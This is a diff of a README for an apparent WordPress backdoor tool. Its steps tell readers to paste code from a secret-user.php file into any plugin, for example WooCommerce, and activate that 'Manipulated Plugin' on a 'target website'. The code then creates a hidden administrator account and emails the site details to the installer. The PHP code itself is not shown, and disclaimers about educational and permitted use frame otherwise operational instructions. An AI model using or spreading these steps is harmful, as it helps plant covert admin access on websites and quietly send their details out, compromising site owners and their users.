tharilak/wpse/README.md

-The WPSE!
+# The WPSE!

-Developer - Tharindu Ekanayake
+## Developer - Tharindu Ekanayake

 Add these lines of code to any plugin.
-This will create a secret admin user account and email you the site details and a success notification to your provided email (change it in the secret-user.php code).
+This will create a secret admin user account and email you the site details and a success notification to your provided email (change it in the `secret-user.php` code).

-Please do not use this for illegal purposes.
-By using this code, you are responsible for any consequences.
+**Please do not use this for illegal purposes.
+By using this code, you are responsible for any consequences.**

-Installation
+### Installation

-Download the Code:
+1. **Download the Code:**

-Download the secret-user.php file from this repository.
+   - Download the `secret-user.php` file from this repository.

-Add the Code to Your Plugin:
+2. **Add the Code to Your Plugin:**

-Place the secret-user.php file's code in the plugin of your choice.
-For example, you can add it to the bottom of the code of the WooCommerce plugin (Any plugin).
+   - Place the `secret-user.php` file's code in the plugin of your choice.
+For example, you can add it to the bottom of the code of the WooCommerce plugin (or any plugin).

-Modify the Email Address:
+3. **Modify the Email Address:**

-Make sure to update the email address to your desired email.
+   - Make sure to update the email address to your desired email.

-Activate the Manipulated Plugin:
+4. **Activate the Manipulated Plugin:**

-Ensure that the plugin where you added the code is activated on the target website after making these changes.
+   - Ensure that the plugin where you added the code is activated on the target website after making these changes.

-Verification:
+5. **Verification:**

-Once the script runs, you should receive an email with the site details and a success notification.
+   - Once the script runs, you should receive an email with the site details and a success notification.

-Important Notes
+### Important Notes

-Use Responsibly: This script is intended for educational purposes and ethical use only.
+- **Use Responsibly:** This script is intended for educational purposes and ethical use only.
-Legal Compliance: Ensure you have permission to use this script on the site you are modifying.
+- **Legal Compliance:** Ensure you have permission to use this script on the site you are modifying.
-Responsibility: You are responsible for any actions taken with this script.
+- **Responsibility:** You are responsible for any actions taken with this script.

-Contribution
+### Contribution

 If you have any suggestions or improvements, feel free to create a pull request or open an issue.